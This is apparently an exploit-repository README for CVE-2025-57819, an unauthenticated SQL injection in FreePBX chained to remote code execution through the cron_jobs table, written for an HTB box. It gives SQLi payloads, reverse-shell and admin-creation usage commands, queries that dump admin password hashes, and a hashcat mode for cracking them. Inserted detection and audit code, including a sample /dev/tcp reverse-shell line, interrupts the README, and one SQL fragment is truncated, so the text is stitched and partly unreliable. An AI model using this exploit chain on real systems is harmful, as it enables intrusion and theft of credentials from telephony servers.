## https://sploitus.com/exploit?id=C6B5D6BD-CFEC-571A-B766-B82261AE3DD8
# CVE-2025-57819: FreePBX Unauthenticated SQLi → RCE

One-shot exploit for the FreePBX **Endpoint Manager** unauthenticated SQL
injection (CVE-2025-57819), chained into remote code execution via the
FreePBX `cron_jobs` table.

Developed and tested against the HTB box **Connected** (FreePBX `16.0.40.7`).

> For authorized security testing / CTF use only.

---

## Vulnerability

The endpoint module's ajax handler concatenates the `brand` parameter straight
into a SQL query, and the module path `FreePBX\modules\endpoint\ajax` bypasses
the ajax Referrer/authentication check. This gives an **unauthenticated**
error-based SQL injection (via `EXTRACTVALUE`), with **stacked-query writes**
enabled.

Injection point:

```
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=
```

Proof (error-based readout):

```
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}
```
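As an added detection example (not part of this exploit repo or of any project it references): the following Python scans Apache/Nginx combined-format access-log lines for requests matching the injection point above, i.e. `/admin/ajax.php` with a `module` value that is a namespace path into the endpoint module's ajax handler and SQL tokens in `brand`. The log lines are constructed samples and the signature regexes are heuristics of my own.

```python
"""Detect CVE-2025-57819 probing in web-server access logs.

Added example for this README, not code from the exploit repo. The log lines
are constructed samples and the signatures are heuristics keyed to the
injection point described above: /admin/ajax.php, a `module` value that is a
namespace path into the endpoint module's ajax handler, and SQL tokens in
`brand`.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample traffic (not a real capture): a benign dashboard load,
# an EXTRACTVALUE error-based probe, and a stacked-query probe.
SAMPLE_LOG = """\
10.10.14.5 - - [12/Sep/2025:10:01:02 +0000] "GET /admin/config.php?display=dashboard HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Sep/2025:10:01:09 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x%27%20AND%20EXTRACTVALUE(1%2CCONCAT(%27~%27%2C(SELECT%20USER())%2C%27~%27))%20--%20- HTTP/1.1" 200 190 "-" "python-requests/2.32.3"
10.10.14.5 - - [12/Sep/2025:10:01:15 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x%27%3B%20SELECT%201%20--%20- HTTP/1.1" 200 190 "-" "python-requests/2.32.3"
"""


def classify_request(target: str) -> Optional[dict]:
    """Return a finding for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/ajax.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    module = qs.get("module", [""])[0]
    brand = qs.get("brand", [""])[0]
    reasons = []
    # A module given as a backslash/slash path rather than a plain module name
    # is the trait that sidesteps the ajax referrer/auth check.
    if ("\\" in module or "/" in module) and "endpoint" in module.lower():
        reasons.append("module-path-to-endpoint-ajax")
    if re.search(r"extractvalue|updatexml", brand, re.I):
        reasons.append("error-based-sqli-function")
    if re.search(r"'\s*;", brand):
        reasons.append("stacked-query")
    if re.search(r"'\s*(and|or)\b|--\s*-?\s*$|/\*", brand, re.I):
        reasons.append("sql-metacharacters")
    if not reasons:
        return None
    return {"module": module, "brand": brand, "reasons": reasons}


def scan_log(text: str) -> list:
    """Apply classify_request to every parsable line; return the findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m["target"])
        if hit:
            hit.update(ip=m["ip"], ts=m["ts"], status=m["status"], ua=m["ua"])
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], ",".join(f["reasons"]), f["brand"][:60])
```

The `module` check is the one worth alerting on by itself: a legitimate Endpoint Manager call passes `module=endpoint`, never a backslash-separated class path, so that trait alone separates this bypass from ordinary admin traffic even when the `brand` payload is obfuscated.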

**Affected:** FreePBX 15

```sql
','',NULL,'* * * * *',30,1,1);
```

The injected command is a bash reverse shell. The cron row is removed
automatically after the first callback to avoid repeated connections.
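As an added defensive check (not part of this repo): the following Python audits `cron_jobs` rows for the kind of entry this exploit writes. The table layout is an assumption modelled on the tail of the INSERT fragment above (schedule, max_runtime, enabled, execution_order); confirm the live schema with `DESCRIBE cron_jobs` and adapt the SELECT before running it against a real FreePBX database. `sqlite3` stands in for MariaDB so the example runs offline, and the rows, the module allowlist and the runner prefixes are constructed.

```python
"""Audit cron_jobs rows for injected shell commands (CVE-2025-57819 RCE vector).

Added example for this README, not code from the exploit repo. The table
layout below is an ASSUMPTION modelled on the tail of the INSERT fragment
above (..., schedule, max_runtime, enabled, execution_order); check the live
schema with `DESCRIBE cron_jobs` and adapt the SELECT before using this
against a real FreePBX database. sqlite3 stands in for MariaDB so the
example runs offline.
"""
import re
import sqlite3

# Command indicators typical of reverse shells and download-and-run loaders.
SUSPICIOUS = re.compile(
    r"/dev/tcp/|bash\s+-i|\b(nc|ncat|socat)\b|base64\s+-d|\|\s*(ba)?sh\b|python[23]?\s+-c",
    re.I,
)

# What legitimate FreePBX cron jobs normally invoke (assumption; narrow it to
# what your own installation's rows actually look like).
KNOWN_RUNNERS = ("php ", "/usr/sbin/fwconsole ")

# Allowlist of module names (constructed); in practice derive it from the
# installed-module list rather than hard-coding it.
KNOWN_MODULES = {"core", "backup", "endpoint", "framework"}


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample table: two normal jobs, one injected, one odd."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cron_jobs (id INTEGER PRIMARY KEY, modulename TEXT, "
        "jobname TEXT, command TEXT, class TEXT, schedule TEXT, "
        "max_runtime INTEGER, enabled INTEGER, execution_order INTEGER)"
    )
    rows = [
        ("core", "core_maintenance",
         "php /var/www/html/admin/modules/core/bin/maintenance.php", None, "0 3 * * *", 30, 1, 1),
        ("backup", "backup_nightly", "/usr/sbin/fwconsole backup --id=1", None, "0 2 * * *", 30, 1, 1),
        # Injected row: every minute, bash reverse shell (placeholders, not a live address).
        ("endpoint", "x", "bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1", None, "* * * * *", 30, 1, 1),
        # Unknown module name running a script out of /tmp.
        ("zzz", "y", "php /tmp/.x.php", None, "*/5 * * * *", 30, 1, 1),
    ]
    conn.executemany(
        "INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, "
        "max_runtime, enabled, execution_order) VALUES (?,?,?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


def audit_cron_jobs(conn, known_modules=KNOWN_MODULES) -> list:
    """Return flagged rows with the reasons each one tripped."""
    flagged = []
    cur = conn.execute(
        "SELECT id, modulename, jobname, command, schedule, enabled FROM cron_jobs")
    for row_id, modulename, jobname, command, schedule, enabled in cur:
        command = (command or "").strip()
        reasons = []
        if SUSPICIOUS.search(command):
            reasons.append("shell-indicator")
        if modulename not in known_modules:
            reasons.append("unknown-module")
        # Every-minute jobs that are not one of the usual runners are how the
        # injected row gets its callback quickly.
        if schedule.strip() == "* * * * *" and not command.startswith(KNOWN_RUNNERS):
            reasons.append("every-minute-non-runner")
        if reasons:
            flagged.append({"id": row_id, "modulename": modulename, "jobname": jobname,
                            "command": command, "enabled": enabled, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in audit_cron_jobs(build_sample_db()):
        print(hit["id"], hit["modulename"], ",".join(hit["reasons"]), hit["command"])
```

Because the exploit deletes its row after the first callback, a point-in-time query can miss it entirely; run this on a schedule, keep row counts over time, and pair it with web-log detection of the injection request (and the MariaDB binary log, if enabled) rather than relying on the table contents alone.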

## Requirements

```bash
pip install requests urllib3
```

Python 3. The built-in IP detection (`-i/--interface`) is Linux-only; use
`--ip` on other platforms.

## Usage

```bash
# Defaults: interface tun0, port 4444; starts listener, exploits, drops a shell
python3 exploit.py http://connected.htb

# Pick a different interface / port
python3 exploit.py http://connected.htb -i eth0 -p 9001

# Set the listener IP explicitly
python3 exploit.py http://connected.htb --ip 10.10.15.52

python3 exploit.py --help
```

The script:

1. Confirms the SQLi (leaks the DB version).
2. Starts a TCP listener on the chosen port.
3. Injects the reverse-shell cron job and verifies the row landed.
4. Waits ~70s for the callback, then drops you into an interactive shell
   (with an automatic PTY upgrade attempt).
5. Cleans up the injected cron row.

## Files

| File         | Purpose                                                          |
|--------------|------------------------------------------------------------------|
| `exploit.py` | **Main one-shot exploit** (SQLi → cron_jobs RCE → auto shell).   |
| `poc3.py`    | Standalone SQLi toolkit: `--shell`, `--rce`, `--cron-rce`, loot. |
| `poc2.py`    | Minimal admin-user creator via the write primitive.              |
| `poc.py`     | Original third-party PoC (non-functional: wrong endpoints).      |
| `ami_rce.py` | Asterisk AMI RCE attempt (dead end here: port 5038 is filtered). |

### `poc3.py`: manual SQLi toolkit

```bash
python3 poc3.py http://connected.htb                # auto-loot (DB user, ampusers hashes)
python3 poc3.py http://connected.htb --shell        # interactive sql> prompt
python3 poc3.py http://connected.htb --create-admin # insert a FreePBX admin
python3 poc3.py http://connected.htb --cron-rce --lhost 10.10.15.52 --lport 4444
```

In `--shell`, queries must return a single string column (use `CONCAT`):

```sql
SELECT GROUP_CONCAT(username,0x3a,password_sha1 SEPARATOR 0x0a) FROM asterisk.ampusers
SELECT GROUP_CONCAT(keyword,0x3d,value SEPARATOR 0x0a) FROM asterisk.freepbx_settings WHERE keyword LIKE 'AMPMGR%'
```

The admin password hashes are SHA1 (`hashcat -m 100`).

## Notes & dead ends

- **No FILE privilege** → `INTO OUTFILE` webshell and `LOAD_FILE` reads fail.
- **AMI (port 5038) is filtered** externally → the manager-credential RCE path
  is not reachable from outside; `cron_jobs` is the working vector.
- There is **no public Metasploit module** for this CVE yet (only an open
  Rapid7 PR at time of writing).

## References

- [Horizon3.ai: Updated FreePBX CVEs, Auth Bypass & RCE](https://horizon3.ai/attack-research/vulnerabilities/cve-2025-57819/)
- [watchTowr Labs: FreePBX CVE-2025-57819](https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/)
- [watchTowr PoC (GitHub)](https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819)
- [NVD: CVE-2025-57819](https://nvd.nist.gov/vuln/detail/CVE-2025-57819)
- [FreePBX advisory GHSA-m42g-xg4c-5f3h](https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h)